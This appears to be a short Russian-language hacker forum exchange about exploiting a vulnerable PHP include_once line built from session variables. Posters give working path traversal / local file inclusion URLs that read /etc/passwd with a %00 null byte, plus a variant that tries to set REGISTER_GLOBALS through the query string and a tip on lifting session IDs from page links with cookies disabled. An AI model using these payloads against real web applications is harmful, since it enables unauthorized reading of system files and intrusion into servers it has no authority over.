18: include_once("../web/".$session_chat[$sid]['asp_login']."/".$session_chat[$sid]['asp_login']."-conf-init.php") ;
у кого какие мысли?
можно раздрочить?

/script.php?sid=1&session_chat[1][asp_login]=../../../../../etc/passwd%00

hhover, здорово, только вот если register_globals=off...

надо тогда так

/script.php?REGISTER_GLOBALS=ON&sid=1&session_chat[1][asp_login]=../../../../../etc/passwd%00


=\\\\\\\

Ну просто отрубаем куки и смотрим sid в адресах ссылок на странице.

кез, ты забыл ini_set )